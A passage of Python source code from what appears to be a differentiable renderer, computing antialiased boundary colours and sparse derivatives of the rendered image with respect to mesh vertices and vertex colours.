verticesBndOutside = verticesBndSamples[facesOutsideBnd]
vc = self.vc.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2 , 3])
vc[vc > 1] = 1
vc[vc < 0] = 0
vcBnd = vc
vcBndSamples = np.tile(vcBnd[None,:,:],[self.nsamples,1,1,1])
vcBndOutside = vcBndSamples[facesOutsideBnd]
invViewMtx = np.linalg.inv(np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])])
#
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
# invCamMtx = np.r_[np.c_[np.linalg.inv(self.camera.camera_mtx), np.array([0,0,0])], np.array([[0, 0, 0, 1]])]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
verticesBndOutside = np.concatenate([verticesBndOutside.reshape([-1,3]), np.ones([verticesBndOutside.size//3, 1])], axis=1)
projVerticesBndOutside = (camMtx.dot(view_mtx)).dot(verticesBndOutside.T).T[:,:3].reshape([-1,2,3])
projVerticesBndDir = projVerticesBndOutside[:,1,:] - projVerticesBndOutside[:,0,:]
projVerticesBndDir = projVerticesBndDir/np.sqrt((np.sum(projVerticesBndDir ** 2, 1)))[:, None]
dproj = (intersectPoint[:,0]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,0]) / (projVerticesBndDir[:,0] - projVerticesBndDir[:,2]*intersectPoint[:,0])
# Code to check computation that dproj == dprojy
# dproj_y = (intersectPoint[:,1]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,1]) / (projVerticesBndDir[:,1] - projVerticesBndDir[:,2]*intersectPoint[:,1])
projPoint = projVerticesBndOutside[:,0,:][:,: ] + dproj[:,None]*projVerticesBndDir[:,:]
projPointVec4 = np.concatenate([projPoint, np.ones([projPoint.shape[0],1])], axis=1)
viewPointIntersect = (invViewMtx.dot(np.linalg.inv(camMtx)).dot(projPointVec4.T.reshape([4,-1])).reshape([4,-1])).T[:,:3]
barycentricVertsDistIntesect = np.linalg.norm(viewPointIntersect - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,0,:], axis=1)
barycentricVertsDistIntesect2 = np.linalg.norm(viewPointIntersect - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,1,:], axis=1)
# Code to check barycentricVertsDistIntesect + barycentricVertsDistIntesect2 = barycentricVertsDistEdge
barycentricVertsDistEdge = np.linalg.norm(verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,0,:] - verticesBndOutside[:,0:3].reshape([-1, 2, 3])[:,1,:], axis=1)
nonIntersect = np.abs(barycentricVertsDistIntesect + barycentricVertsDistIntesect2 - barycentricVertsDistEdge) > 1e-4
argminDistNonIntersect = np.argmin(np.c_[barycentricVertsDistIntesect[nonIntersect], barycentricVertsDistIntesect2[nonIntersect]],1)
barycentricVertsIntersect = barycentricVertsDistIntesect2 / (barycentricVertsDistIntesect + barycentricVertsDistIntesect2)
barycentricVertsIntersect[nonIntersect] = np.array(argminDistNonIntersect == 0).astype(np.float64)
self.barycentricVertsIntersect = barycentricVertsIntersect
self.viewPointIntersect = viewPointIntersect
self.viewPointIntersect[nonIntersect] = verticesBndOutside.reshape([-1, 2, 4])[nonIntersect, :, 0:3][np.arange(nonIntersect.sum()), argminDistNonIntersect, :]
vcEdges1 = barycentricVertsIntersect[:, None] * vcBndOutside.reshape([-1, 2, 3])[:, 0, :]
self.barycentricVertsIntersect = barycentricVertsIntersect
vcEdges2 = (1-barycentricVertsIntersect[:,None]) * vcBndOutside.reshape([-1,2,3])[:,1,:]
#Color:
colorVertsEdge = vcEdges1 + vcEdges2
#Point IN edge barycentric
d_finalNP = np.minimum(d_final.copy(),1.)
self.d_final_outside = d_finalNP
self.t_area_bnd_outside = t_area_bnd_outside
self.t_area_bnd_edge = t_area_bnd_edge
self.t_area_bnd_inside = t_area_bnd_inside
areaWeights = np.zeros([nsamples, nBndFaces])
areaWeights[facesOutsideBnd] = (1-d_finalNP)*t_area_bnd_edge + d_finalNP *t_area_bnd_outside
areaWeights[facesInsideBnd] = t_area_bnd_inside
areaWeightsTotal = areaWeights.sum(0)
# areaWeightsTotal[areaWeightsTotal < 1] = 1
self.areaWeightsTotal = areaWeightsTotal
finalColorBndOutside = np.zeros([self.nsamples, boundaryFaces.size, 3])
finalColorBndOutside_edge = np.zeros([self.nsamples, boundaryFaces.size, 3])
finalColorBndInside = np.zeros([self.nsamples, boundaryFaces.size, 3])
sampleColorsOutside = sampleColors[facesOutsideBnd]
self.sampleColorsOutside = sampleColors.copy()
finalColorBndOutside[facesOutsideBnd] = sampleColorsOutside
finalColorBndOutside[facesOutsideBnd] = sampleColorsOutside / self.nsamples
self.finalColorBndOutside_for_dr = finalColorBndOutside.copy()
# finalColorBndOutside[facesOutsideBnd] *= d_finalNP[:, None] * t_area_bnd_outside[:, None]
finalColorBndOutside[facesOutsideBnd] *= d_finalNP[:, None]
finalColorBndOutside_edge[facesOutsideBnd] = colorVertsEdge
finalColorBndOutside_edge[facesOutsideBnd] = colorVertsEdge/ self.nsamples
self.finalColorBndOutside_edge_for_dr = finalColorBndOutside_edge.copy()
# finalColorBndOutside_edge[facesOutsideBnd] *= (1 - d_finalNP[:, None]) * t_area_bnd_edge[:, None]
finalColorBndOutside_edge[facesOutsideBnd] *= (1 - d_finalNP[:, None])
sampleColorsInside = sampleColors[facesInsideBnd]
self.sampleColorsInside = sampleColorsInside.copy()
# finalColorBndInside[facesInsideBnd] = sampleColorsInside * self.t_area_bnd_inside[:, None]
finalColorBndInside[facesInsideBnd] = sampleColorsInside / self.nsamples
# finalColorBnd = finalColorBndOutside + finalColorBndOutside_edge + finalColorBndInside
finalColorBnd = finalColorBndOutside + finalColorBndOutside_edge + finalColorBndInside
# finalColorBnd /= areaWeightsTotal[None, :, None]
bndColorsImage = np.zeros_like(self.render_resolved)
bndColorsImage[(zerosIm * boundaryImage), :] = np.sum(finalColorBnd, axis=0)
# bndColorsImage1 = np.zeros_like(self.render_resolved)
# bndColorsImage1[(zerosIm * boundaryImage), :] = np.sum(self.finalColorBndOutside_for_dr, axis=0)
#
# bndColorsImage2 = np.zeros_like(self.render_resolved)
# bndColorsImage2[(zerosIm * boundaryImage), :] = np.sum(self.finalColorBndOutside_edge_for_dr, axis=0)
#
# bndColorsImage3 = np.zeros_like(self.render_resolved)
# bndColorsImage3[(zerosIm * boundaryImage), :] = np.sum(finalColorBndInside, axis=0)
finalColorImageBnd = bndColorsImage
if np.any(boundaryImage):
finalColor = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * finalColorImageBnd
# finalColor1 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage1
# finalColor2 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage2
# finalColor3 = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * bndColorsImage3
else:
finalColor = self.color_image
finalColor[finalColor>1] = 1
finalColor[finalColor<0] = 0
return finalColor
def compute_derivatives_verts(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
n_norm = self.n_norm
dist = self.dist
linedist = self.linedist
d = self.d
v1 = self.v1
lnorm = self.lnorm
finalColorBndOutside_for_dr = self.finalColorBndOutside_for_dr
finalColorBndOutside_edge_for_dr = self.finalColorBndOutside_edge_for_dr
d_final_outside = self.d_final_outside
barycentricVertsIntersect = self.barycentricVertsIntersect
# xdiff = dEdx
# ydiff = dEdy
nVisF = len(visibility.ravel()[visible])
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility!=4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape(
[nsamples, -1, 2])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage)&(visibility !=4294967295 )]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
p1 = vertsProjBndSamplesOutside[:, 0, :]
p2 = vertsProjBndSamplesOutside[:, 1, :]
p = sampleV[facesOutsideBnd]
#Computing gradients:
#A multisampled pixel color is given by: w R + (1-w) R' thus:
#1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
#2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
#3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
#4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
#5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
#6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
#7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
#for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
#Finally, stack data, and IJ of nonbnd with bnd on both dwrt_v and dwrt_vc.
######## 1 derivatives samples outside wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# #Chumpy autodiff code to check derivatives here:
# chEdgeVerts = ch.Ch(vertsProjBndSamplesOutside)
#
# chEdgeVerts1 = chEdgeVerts[:,0,:]
# chEdgeVerts2 = chEdgeVerts[:,1,:]
#
# chSampleVerts = ch.Ch(sampleV[facesOutsideBnd])
# # c1 = (chEdgeVerts1 - chSampleVerts)
# # c2 = (chEdgeVerts2 - chSampleVerts)
# # n = (chEdgeVerts2 - chEdgeVerts1)
#
# #Code to check computation of distance below
# # d2 = ch.abs(c1[:,:,0]*c2[:,:,1] - c1[:,:,1]*c2[:,:,0]) / ch.sqrt((ch.sum(n**2,2)))
# # # np_mat = ch.dot(ch.array([[0,-1],[1,0]]), n)
# # np_mat2 = -ch.concatenate([-n[:,:,1][:,:,None], n[:,:,0][:,:,None]],2)
# # np_vec2 = np_mat2 / ch.sqrt((ch.sum(np_mat2**2,2)))[:,:,None]
# # d2 = d2 / ch.maximum(ch.abs(np_vec2[:,:,0]),ch.abs(np_vec2[:,:,1]))
#
# chl = (chEdgeVerts2 - chEdgeVerts1)
# chlinedist = ch.sqrt((ch.sum(chl**2,axis=1)))[:,None]
# chlnorm = chl/chlinedist
#
# chv1 = chSampleVerts - chEdgeVerts1
# chd = chv1[:,0]* chlnorm[:,0] + chv1[:,1]* chlnorm[:,1]
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
# # intersectPointDist1 = intersectPoint - chEdgeVerts1
# # intersectPointDist2 = intersectPoint - chEdgeVerts2
# # Code to check computation of distances below:
# # lengthIntersectToPoint1 = np.linalg.norm(intersectPointDist1.r,axis=1)
# # lengthIntersectToPoint2 = np.linalg.norm(intersectPointDist2.r,axis=1)
#
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
#
# chlineToPoint = (chSampleVerts - chintersectPoint)
# chn_norm = chlineToPoint / ch.sqrt((ch.sum(chlineToPoint ** 2, axis=1)))[:, None]
#
# chdist = chlineToPoint[:,0]*chn_norm[:,0] + chlineToPoint[:,1]*chn_norm[:,1]
#
# d_final_ch = chdist / ch.maximum(ch.abs(chn_norm[:, 0]), ch.abs(chn_norm[:, 1]))
#
# d_final_outside = d_final_ch.ravel()
# dwdv = d_final_outside.dr_wrt(chEdgeVerts1)
# rows = np.tile(np.arange(d_final_outside.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_outside.shape[0] * 2)
#
# dwdv_r_v1 = np.array(dwdv[rows, cols]).reshape([-1, 2])
#
# dwdv = d_final_outside.dr_wrt(chEdgeVerts2)
# rows = np.tile(np.arange(d_final_ch.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_ch.shape[0] * 2)
#
# dwdv_r_v2 = np.array(dwdv[rows, cols]).reshape([-1, 2])
nonIntersect = self.nonIntersect
argminDistNonIntersect = self.argminDistNonIntersect
max_dx_dy = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final_np = dist / max_dx_dy
d_final_np = dist
ident = np.identity(2)
ident = np.tile(ident[None, :], [len(p2), 1, 1])
dlnorm = (ident - np.einsum('ij,ik->ijk', lnorm, lnorm)) / linedist[:, None]
dl_normdp1 = np.einsum('ijk,ikl->ijl', dlnorm, -ident)
dl_normdp2 = np.einsum('ijk,ikl->ijl', dlnorm, ident)
dv1dp1 = -ident
dv1dp2 = 0
dddp1 = np.einsum('ijk,ij->ik', dv1dp1, lnorm) + np.einsum('ij,ijl->il', v1, dl_normdp1)
dddp2 = 0 + np.einsum('ij,ijl->il', v1, dl_normdp2)
dipdp1 = ident + (dddp1[:,None,:]*lnorm[:,:,None]) + d[:,None,None]*dl_normdp1
dipdp2 = (dddp2[:,None,:]*lnorm[:,:,None]) + d[:,None,None]*dl_normdp2
dndp1 = -dipdp1
dndp2 = -dipdp2
dn_norm = (ident - np.einsum('ij,ik->ijk', n_norm, n_norm)) / dist[:,None]
dn_normdp1 = np.einsum('ijk,ikl->ijl', dn_norm, dndp1)
dn_normdp2 = np.einsum('ijk,ikl->ijl', dn_norm, dndp2)
ddistdp1 = np.einsum('ij,ijl->il', n_norm, dndp1)
ddistdp2 = np.einsum('ij,ijl->il', n_norm, dndp2)
argmax_nx_ny = np.argmax(np.abs(n_norm),axis=1)
dmax_nx_ny_p1 = np.sign(n_norm)[np.arange(len(n_norm)),argmax_nx_ny][:,None]*dn_normdp1[np.arange(len(dn_normdp1)),argmax_nx_ny]
dmax_nx_ny_p2 = np.sign(n_norm)[np.arange(len(n_norm)),argmax_nx_ny][:,None]*dn_normdp2[np.arange(len(dn_normdp2)),argmax_nx_ny]
# dd_final_dp1 = -1./max_dx_dy[:,None]**2 * dmax_nx_ny_p1 * dist + 1./max_dx_dy[:,None] * ddistdp1
# dd_final_dp2 = -1./max_dx_dy[:,None]**2 * dmax_nx_ny_p2 * dist + 1./max_dx_dy[:,None] * ddistdp2
dd_final_dp1 = ddistdp1
dd_final_dp2 = ddistdp2
#For those non intersecting points straight to the edge:
v1 = self.v1[nonIntersect][argminDistNonIntersect==0]
v1_norm = v1/np.sqrt((np.sum(v1**2,axis=1)))[:,None]
dd_final_dp1_nonintersect = -v1_norm
v2 = self.v2[nonIntersect][argminDistNonIntersect==1]
v2_norm = v2/np.sqrt((np.sum(v2**2,axis=1)))[:,None]
dd_final_dp2_nonintersect = -v2_norm
dd_final_dp1[nonIntersect][argminDistNonIntersect == 0] = dd_final_dp1_nonintersect
dd_final_dp1[nonIntersect][argminDistNonIntersect == 1] = 0
dd_final_dp2[nonIntersect][argminDistNonIntersect == 1] = dd_final_dp2_nonintersect
dd_final_dp2[nonIntersect][argminDistNonIntersect == 0] = 0
dImage_wrt_outside_v1 = finalColorBndOutside_for_dr[facesOutsideBnd][:,:,None]*dd_final_dp1[:,None,:] - dd_final_dp1[:,None,:]*finalColorBndOutside_edge_for_dr[facesOutsideBnd][:,:,None]
dImage_wrt_outside_v2 = finalColorBndOutside_for_dr[facesOutsideBnd][:,:,None]*dd_final_dp2[:,None,:] - dd_final_dp2[:,None,:]*finalColorBndOutside_edge_for_dr[facesOutsideBnd][:,:,None]
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2*2)).ravel()
# faces = f[sampleFaces[facesOutsideBnd]].ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = np.tile(faces.reshape([1, -1, 2]), [self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data1 = dImage_wrt_outside_v1.transpose([1,0,2])
data2 = dImage_wrt_outside_v2.transpose([1,0,2])
data = np.concatenate([data1[:,:,None,:], data2[:,:,None,:]], 2)
data = data.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd_outside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
######## 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
######## 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
verticesBnd = self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3])
sampleBarycentricBar = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([-1, 3, 1])
verts = np.sum(self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3, 3]) * sampleBarycentricBar, axis=1)
dImage_wrt_bar_v = self.barycentricDerivatives(verticesBnd, f[sampleFaces.ravel()], verts).swapaxes(0,1)
dImage_wrt_bar_v[facesOutsideBnd.ravel()] = dImage_wrt_bar_v[facesOutsideBnd.ravel()] * d_final_outside[:,None,None, None] * self.t_area_bnd_outside[:, None, None, None]
dImage_wrt_bar_v[facesInsideBnd.ravel()] = dImage_wrt_bar_v[facesInsideBnd.ravel()] * self.t_area_bnd_inside[:, None, None, None]
# dImage_wrt_bar_v /= np.tile(areaWeightsTotal[None,:], [self.nsamples,1]).ravel()[:, None,None, None]
dImage_wrt_bar_v /= self.nsamples
### Derivatives wrt V: 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
# data = np.tile(dImage_wrt_bar_v[facesOutsideBnd.ravel()][None,:],[3,1,1,1]).ravel()
data = np.transpose(dImage_wrt_bar_v[facesOutsideBnd.ravel()],[1,0,2,3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_outside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
### Derivatives wrt V: 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesInsideBnd]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
faces = f[sampleFaces[facesInsideBnd]].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v[facesInsideBnd.ravel()], [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_inside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
####### 3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
frontFacing = self.frontFacingEdgeFaces[(zerosIm * boundaryImage).ravel().astype(np.bool)].astype(np.bool)
frontFacingEdgeFaces = self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]][frontFacing]
verticesBnd = self.v.r[f[frontFacingEdgeFaces.ravel()].ravel()].reshape([1, -1, 3])
verticesBnd = np.tile(verticesBnd, [self.nsamples, 1,1])
verticesBnd = verticesBnd.reshape([-1,3,3])[facesOutsideBnd.ravel()].reshape([-1,3])
verts = self.viewPointIntersect
fFrontEdge = np.tile(f[frontFacingEdgeFaces][None,:], [self.nsamples, 1, 1]).reshape([-1,3])[facesOutsideBnd.ravel()]
dImage_wrt_bar_v_edge = self.barycentricDerivatives(verticesBnd, fFrontEdge, verts).swapaxes(0, 1)
dImage_wrt_bar_v_edge = dImage_wrt_bar_v_edge * (1-d_final_outside[:,None,None, None]) * self.t_area_bnd_edge[:, None, None, None]
# dImage_wrt_bar_v_edge /= np.tile(self.areaWeightsTotal[None,:], [self.nsamples,1])[facesOutsideBnd][:, None, None,None]
dImage_wrt_bar_v_edge /= self.nsamples
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 3 * 2)).ravel()
# faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = f[frontFacingEdgeFaces]
faces = np.tile(faces.reshape([1, -1, 3]), [self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v_edge, [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_outside_edge = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
vertsPerFaceProjBnd = self.camera.r[f[nonBoundaryFaces].ravel()].reshape([-1,3,2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_nonbnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_nonbnd[t_area_nonbnd> 1] = 1
bc = barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))
verts = np.sum(self.v.r[f[nonBoundaryFaces.ravel()].ravel()].reshape([-1, 3, 3]) * bc[:, :,None], axis=1)
didp = self.barycentricDerivatives(verticesNonBnd, f[nonBoundaryFaces.ravel()], verts)
didp = didp * t_area_nonbnd[None,:,None, None]
n_channels = np.atleast_3d(observed).shape[2]
shape = visibility.shape
####### 2: Take the data and copy the corresponding dxs and dys to these new pixels.
### Derivatives wrt V:
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.where(((~boundaryImage)&(visibility !=4294967295 )).ravel())[0]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
JS = col(f[nonBoundaryFaces].ravel())
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
# data = np.concatenate(((visTriVC[:,0,:] * dBar1dx[:,None])[:,:,None],(visTriVC[:, 0, :] * dBar1dy[:, None])[:,:,None], (visTriVC[:,1,:]* dBar2dx[:,None])[:,:,None], (visTriVC[:, 1, :] * dBar2dy[:, None])[:,:,None],(visTriVC[:,2,:]* dBar3dx[:,None])[:,:,None],(visTriVC[:, 2, :] * dBar3dy[:, None])[:,:,None]),axis=2).swapaxes(0,1).ravel()
data = didp.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_nonbnd = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
# result_wrt_verts_nonbnd.sum_duplicates()
if np.any(boundaryImage):
result_wrt_verts = result_wrt_verts_bnd_outside + result_wrt_verts_bar_outside + result_wrt_verts_bar_inside + result_wrt_verts_bar_outside_edge + result_wrt_verts_nonbnd
# result_wrt_verts = result_wrt_verts_bnd_outside
else:
result_wrt_verts = result_wrt_verts_nonbnd
return result_wrt_verts
def compute_derivatives_vc(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
d_final_outside = self.d_final_outside
barycentricVertsIntersect = self.barycentricVertsIntersect
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility!=4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage)&(visibility !=4294967295 )]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
#Computing gradients:
#A multisampled pixel color is given by: w R + (1-w) R' thus:
#1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
#2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
#3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
#4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
#5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
#6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
#7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
#for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
####### 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
dImage_wrt_outside_vc_outside = d_final_outside[:,None] * sampleBarycentric[facesOutsideBnd] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_outside.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_bnd_outside = result
# result_wrt_vc_bnd_outside.sum_duplicates()
######## 5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
dImage_wrt_outside_vc_edge = (1-d_final_outside[:, None]) * np.c_[barycentricVertsIntersect, 1-barycentricVertsIntersect] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2)).ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = np.tile(faces.reshape([1,-1,2]),[self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_edge.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
